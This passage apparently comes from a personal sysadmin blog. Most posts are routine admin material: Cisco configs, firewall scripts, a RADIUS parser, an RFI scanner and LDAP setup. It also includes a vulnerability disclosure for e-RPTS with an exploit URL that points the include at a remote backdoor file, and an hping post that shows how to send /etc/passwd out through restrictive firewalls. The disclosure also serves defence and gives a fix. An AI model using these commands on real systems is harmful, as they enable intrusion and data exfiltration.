    if [ "$CHAR1" = "#" ]; then
      DESCRIPTION=`echo $RULES|awk '{gsub(/\047/,"");print substr($0,1,60)}'`
    elif [ "$WORD1" = "alert" ]; then

      RULE=`echo -e $RULES|awk '{sub(/alert /,"");gsub(/\047/,"");print}'`

      SID=`echo $RULES|awk '{FS=";";;print $(NF-1)}'|awk '{sub(/sid:/,"");sub(/;/,"");print $0}'`

      NAME="Name"
      CATEGORY="EmergingThreat"
      ALERT="f"
      SETTINGSID=$CURRENTVERSION
      for r in $RACK
      do
        echo -e "INSERT INTO n_ips_rule (rule_id, rule, sid, name, category, description, live, alert, log, settings_id)" \
         " VALUES ( $CUSTOMSID, \047$RULE\047,  $SID , \047$NAME\047, \047$CATEGORY\047," \
         " \047$DESCRIPTION\047, \047$LIVE\047, \047$ALERT\047, \047$LOGGING\047, \047" \
         "$r\047);"     >>newrules.sql
        CUSTOMSID=$(($CUSTOMSID+1))
      done

    fi
  done 
fi 

echo "Done generating SQL"
echo "Load SQL with psql -e -f newrules.sql uvm postgres"
You can also view the file from here.

e-RPTS RFI Vulnerability

About E-RPTS

(from the website)
An Open Source solution for Real Property Taxation in the Philippines

Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units(LGU), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).

eRPTS web- and GIS-ready application that maintains a database of properties and owners for LGUs that is consistent with the Provincial & National government standards. It also generates reports that allows LGUs to improve their monitoring of compliance and revenue generation.

This is a critical vulnerability since the software is being implmented on each of Philippine government's Local Government Units and could expose sensitive data such as tax records and other business related details.

The vulnerability

in the file:

/includes/web/prepend.php



line 20: require($_PHPLIB["libdir"] . "common.inc");
line 21: require($_PHPLIB["libdir"] . "constants.php");
line 22: require($_PHPLIB["libdir"] . "setup.inc");
line 23: require($_PHPLIB["libdir"] . "session.inc");
line 24: require($_PHPLIB["libdir"] . "auth.inc");
line 25: require($_PHPLIB["libdir"] . "perm.inc");
line 26: require($_PHPLIB["libdir"] . "db_mysql.inc");
line 27: require($_PHPLIB["libdir"] . "tr_rpts.inc");
line 28: require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
line 29: require($_PHPLIB["libdir"] . "page.inc");
line 30: require($_PHPLIB["libdir"] . "template.inc");




This code is vulnerable to Remote File Include vulnerability by going to

http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?

For this vulnerability to work, register_globals must be set to on and allow_URL_fopen set to on.


Recommendations

You should disable allow_url_fopen in the php.ini file:

allow_url_fopen = 'off'

The setting can also be disabled in apache's httpd.conf file:

php_flag  allow_url_fopen  off

This is actually an old PHPLIB vulnerability found here [1]. Unfortunately, developers of E-RPTS failed to update to the latest PHPLIB version.

__________________
Bug Discovered by:
John Homer Alvero
__________________


References:

Cisco Router Provider / Subscriber Configuration

Configuration sample for Cisco networking. One end is the provider and another end is a subscriber. The provider's end is using a Cisco 2651XM while the subscriber's end is using a Cisco 805 router.

First, configuration of the provider's side:

Current configuration : 3467 bytes
!
version 12.2
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname CiscoHost
!
!
enable secret 5 $1$JGXe$Y2vHtRP89namalZbyeMG./
enable password 7 104D010A0618
!
username root password 7 0449030F15400D1A5A
ip subnet-zero
!
!
no ip domain-lookup
ip name-server 8.8.8.8
ip name-server 8.8.4.4
!
!
interface FastEthernet0/0
 description connected to EthernetLAN
 ip address x.x.x.197 255.255.255.192
 duplex auto
 speed auto
!
interface Serial0/0
 no ip address
 encapsulation frame-relay IETF
 frame-relay lmi-type ansi
!
interface Serial0/0.200 point-to-point
 description Link to upstream provider
 bandwidth 2048
 ip address x.x.x.2 255.255.255.252
 frame-relay interface-dlci 200 IETF
!
interface Serial0/0.201 point-to-point
 description frame-relay to Site1
 ip address 10.1.10.9 255.255.255.252
 frame-relay interface-dlci 201 IETF
!
interface Serial0/0.205 point-to-point
 description frame-relay to Site2
 ip address 10.1.10.25 255.255.255.252
 frame-relay interface-dlci 205 IETF
!
interface FastEthernet0/1
 no ip address 
 shutdown
!
interface Serial0/1
 no ip address
 description This interface is for another carrier's backhaul
 encapsulation frame-relay IETF
 frame-relay lmi-type ansi
!
interface Serial0/1.25 point-to-point
 description frame-relay link to Site3
 ip address 10.1.10.13 255.255.255.252
 frame-relay interface-dlci 25 IETF
!
interface Serial0/1.30 point-to-point
 description frame-relay link to Site4
 ip address 10.1.10.33 255.255.255.252
 frame-relay interface-dlci 30 IETF
!
ip classless
ip route 0.0.0.0 0.0.0.0 202.78.109.1
ip route x.x.x.224 255.255.255.248 10.1.10.6
ip route x.x.x.232 255.255.255.248 10.1.10.10
ip route x.x.x.240 255.255.255.248 10.1.10.14
ip route x.x.x.248 255.255.255.248 10.1.10.18
ip route x.x.x.0 255.255.255.248 10.1.10.22
ip route x.x.x.8 255.255.255.248 10.1.10.30
ip route x.x.x.16 255.255.255.248 10.1.10.26
ip route x.x.x.24 255.255.255.248 10.1.10.34
no ip http server
ip pim bidir-enable
!

!
line con 0
 exec-timeout 0 0
 password 7 1511021A0725
line aux 0
line vty 0 4
 exec-timeout 0 0
 password 7 02050D300809
 login authentication local
!
!
end

Now for the subcriber's configuration:
Using 1540 out of 32762 bytes
!
version 11.2
no service password-encryption
service udp-small-servers
service tcp-small-servers
!
hostname Site1
!
enable secret 5 $1$38vT$uCzNqai0a69mBYhyadqnS/
enable password secretpassword
!
!
interface Ethernet0
 ip address x.x.x.17 255.255.255.248
 no ip route-cache
 no ip mroute-cache
!
interface Serial0
 no ip address
 encapsulation frame-relay IETF
 frame-relay lmi-type ansi
!
interface Serial0.100 point-to-point
 description frame-relay link to Upstream provider
 ip address 10.1.10.10 255.255.255.252
 frame-relay interface-dlci 200 IETF
!
interface Serial1
 shutdown
!
no ip classless
ip route 0.0.0.0 0.0.0.0 10.1.10.9
!
line con 0
 exec-timeout 2 0
 password secretpassword
 login
line aux 0
 password secretpassword
 login
 transport input all
line vty 0 4
 password secretpassword
 login
!
end

Note that your frame-relay provider will be the one to assign the DLCI. Take note of the DLCI as this is an important key in the configuration. This guide should ONLY provide as guide. Make necessary changes based on your requirements.

FreeBSD PF Script

Sample pf script for FreeBSD. This is what i used and it worked for me. WMMV

#! /bin/sh

/sbin/ipfw -f flush

# Block an IP address from connecting to external hosts/servers
/sbin/ipfw add deny tcp from 192.168.1.57 to any 

# Redirect port all http traffic to a local proxy server
/sbin/ipfw add fwd [ip.address.of.proxy],3128 tcp from any to any 80

# IPNAT
/sbin/ipfw add divert natd all from any to any via dc0 

# Some traffic shapping
ipfw add pipe 2 ip from any to 192.168.1.101
ipfw pipe 2 config bw 33Kbit/s

ipfw add pipe 3 ip from any to 192.168.1.102
ipfw pipe 3 config bw 512Kbit/s

/sbin/ipfw add pass all from any to any

WiFiCalc

WiFi Calc is a link budget calculator. It will enable you to determine the correct antenna gain, radio power and distance for a point-to-point wireless link.
 


Usage is straight forward. Just input the antenna gain, radio power in dB and distance in kms. and it will compute the signal for each end of the link.

The required signal on each end of the link depends on the receive sensitivity (for a required link speed) of the radio equipment you are using. This information can be found on your radio equipment's datasheet.

RFIScan - a Remote File Include Vulnerability Scanner

I wrote a perl script to find for RFI vulnerabilities in PHP scripts. It takes a folder name as paramater. The script will scan the specified folder and its sub-folders recursively.

usage: ./scan /var/www/html/

#!/usr/bin/perl
#
# PHP RFI Vulnerability Scanner
# John Homer H Alvero
# Feb. 1, 2010

my $file = '';
my @filelist = ();
my $txt_folder = $ARGV[0] . '/';
my $check_declarations = 1;
my $found = 0;

&check_folders($txt_folder);

if ($found) {
        print "RFI Vulnerability Found!\n";
} else {
        print "No vulnerability found\n";
}


# SUB(s)

sub check_folders {
   my($dir) = @_;
   local (*FOLDER);
   my @fileVars = ();
   my $lineVar;

   my(@subfiles, $file, $specfile);
   opendir(FOLDER, $dir) or die "cannot open $dir";

   print "opening folder $dir \n";

   @subfiles = readdir(FOLDER);
   closedir(FOLDER);

   foreach $file (@subfiles) {
      $specfile = $dir .  $file;
      if (-f $specfile && $file =~ m/\S+\.php/) {

      open FILE, "<", $specfile or die $!;
      my $line_ctr = 0;
      print "in file $specfile\n";
      while (< FILE >) {
         $line_ctr++;
         if ($_ =~ m/^(\s|\t)*(include|include\_once|require|require\_once)\s*\(?\s*\$\w*\s*\)?/) {

            my ($line1,$line2,$line3) = $_ =~ m/^(\s|\t)*(include|include\_once|require|require\_once)\s*\(?\s*(\$\w+)\s*\)?/;


            if ($check_declarations) {
              if (!(chomp($line2) !~ @fileVars)) {
                print "Line No: $line_ctr $_";
                $found = 1;
              }

            } else {
                print "Line No: $line_ctr $_";
                $found = 1;
            }
          }

         if ($_ =~ m/^(\s*\$\S*\s*\=\s*)/i) {
            my ($lineVar) = $_ =~ m/^(\s*\$\S*)/i;
            push(@fileVars,$lineVar);
         }
      }
      close(FILE);
      @fileVars = ();
      } elsif (-d $specfile) {
        if ($specfile !~ m/\S+\.$/) {
         &check_folders($specfile . "\/");
      }
      }#if
   }#for
}#sub

bash looping

Basic Loop
#!/bin/bash
for i in 1 2 3 4 5
do
   echo "Number $i"
done

Output:
1
2
3
4
5

Using seq
#!/bin/bash
for i in $(seq 1 2 20)
do
   echo "Number $i"
done

Output:
1
3
5
7
9
11
13
15
17
19

Using the C-style loop:
#!/bin/bash
for (( c=1; c<=5; c++ ))
do
 echo "Number $c"
done

Simple isn't it? If you want an infinite loop:
#!/bin/bash
for (( ; ; ))
do
   echo "infinite loops [ hit CTRL+C to stop]"
done

If you are working with files:
#!/bin/bash
for file in /etc/*
do
     echo $file
done

Those are just the basic. There are tons of tutorial online. I will leave the rest of the topics to you.

whowas.pl - a radius current user viewer

A radius log file parser that displays radius users at a particular point in time. It takes a detail file and a datime/time value as parameter and displays usernames, framed-ip-address and nas-port as output.

Usage:

Make sure to set +x attribute to whowas.pl.
$ chmod +x whowas.pl


Software syntax:

$ whowas.pl <detail_file> <date_time>

e.g.

$ whowas.pl detail "2004-1-10 11:00:00"

The above line will display users currently logged in at "2004-1-10 11:00:00"

Code:
#!/usr/bin/perl
# John Homer H Alvero
# Jan. 11, 2004 

use HTTP::Date;

my $Line;
my @Record;
my $SearchTime = $ARGV[1]; #$ARGV[1];
my $SearchTimestamp = str2time($SearchTime); 

sub ProcessRec {
   my $Header;
   my %AuthRec; 
   my $Fieldname;
   my $Value;
   my $Login;
   my $Logout;
 
   $Header = $Record[0];

   for ($i = 1; $i <= $#Record; $i++) { 
      ($Fieldname, $Value) = split("=",$Record[$i]);
      $Fieldname =~ s/\t//g;
      $Fieldname =~ s/ //g;
      $Value =~ s/ //g;
      $Value =~ s/\"//g;
      chomp($Value); 
      $AuthRec{$Fieldname} = $Value;
   } 
 
   $Login = scalar($AuthRec{"Timestamp"}) -  scalar($AuthRec{"Acct-Session-Time"});
   $Logout = scalar($AuthRec{"Timestamp"});


   if ($AuthRec{"Acct-Status-Type"} =~ /Stop/) {
      if (($SearchTimestamp >= $Login) && ($SearchTimestamp <= $Logout)) {
          print $AuthRec{"User-Name"} . "\t\t" . $AuthRec{"Framed-IP-Address"} . "\t\t" . $AuthRec{"NAS-Port"} . "\n";
          }
   }
}

open(FILE1,$ARGV[0]);

while () {
   $Line = $_;
   if ($Line eq "\n") {
        ProcessRec;
        @Record = ();
        end;
   } else {
        push @Record, $Line;
   }
}

close(FILE1);

You can also download the file here.

Sending / Receiving a file using hping

This method will enable you to send / receive files even through restrictive firewalls. You just have to be creative with the port and protocol.

From the manpage:
hping2 - send (almost) any arbitrary TCP/IP packets to network hosts

Here we go.
On host sending the file, do this:

[host_a]# hping2 host_b --udp -p 53 -d 100 --sign signature --safe --file /etc/passwd

On the receiving host, do this:

[host_b]# hping2 host_a --listen signature --safe --icmp

Be creative with the signature parameter. The parameter string is the key where the receiving side of the connection will start receveing the file. Also, port 53 is usually open for DNS queries and 80 for web traffic.
Good luck.

Sending email direct to qmail-queue with DKIM

#!/usr/bin/perl
# John Homer H Alvero
# Oct 24, 2008

use Mail::QmailQueue;
use Mail::DomainKeys::Message;
use Mail::DomainKeys::Key::Private;

$FinalString = <<EOS;
From: user\@domain.com
MIME-Version: 1.0
Subject: Hello World
To: target\@gmail.com

Test Email! This mail should have valid domain keys.
EOS


open my $fh_message, '<', \ $FinalString;

my $mail = load Mail::DomainKeys::Message(File => $fh_message) or die "unable to load message";
my $priv = load Mail::DomainKeys::Key::Private(File => "/path/to/private/key/file") or die "unable to load key";
$mail->sign(Method => "nofws", Selector => "private", Private => $priv);

$signature = $mail->signature->as_string;


my $qmail = Mail::QmailQueue->new("/var/qmail/bin/qmail-queue");
$qmail->sender('[email protected]');
$qmail->recipient('[email protected]');
$qmail->data('DomainKey-Signature: ' . $signature .';' . "\r\n" . $FinalString);
$qmail->send;

close fh_message;

You can also view the script here.

asterisk cheat-sheet

Just a few asterisk commands:

CommandDescription
reload soft-restarts Asterisk and updates internal configs with changes you’ve made to /etc/asterisk/* - does not hang up calls
sip no debug Disable SIP debugging
show dialplan shows the full dialplan of how your calls will be handled
sip show peers shows all registered SIP clients
sip show channels shows current “live” channels that are in use by SIP clients (off-hook)
sip show registry this command will show you the status of any SIP connections with remote hosts. (eg: Your VOIP carrier.) If you have an authenticated connection with them, it will show as registered otherwise it will show it as unregistered.
sip show users this command will show you a list of all the SIP Users setup in the sip.conf - along with their secret password. This is great for when you go to setup the phones.
database show database Dump
sip debug ip Enable SIP debugging on IP
sip debug peer Enable SIP debugging on Peername
sip no debug Disable SIP debugging
stop gracefully shuts down Asterisk after all calls have hung up
stop now shuts down Asterisk, hanging up any current calls

Outlook 2007 + OpenLdap + CentOS 5.2

1. Install OpenLDAP
yum install openldap-servers.i386

2. Install LDAP clients
yum install openldap-clients.i386

3. Edit the file /etc/openldap/slapd.conf. Make necessary changes specially “dc=companyname,dc=com
suffix “dc=companyname,dc=com”
rootdn “cn=manager,dc=companyname,dc=com”
rootpw {SSHA}wCaiPZjCvjCbQX7xp8j/95zBnl9XQQIj
Note: The rootpw parameter is the hash from the command slappasswd -s test

4. Copy the file /etc/openldap/DB_CONFIG.example to /var/lib/ldap as DB_CONFIG
cp /etc/openldap/DB_CONFIG.example /var/lib/ldap/DB_CONFIG

5. Restart the LDAP service
service ldap restart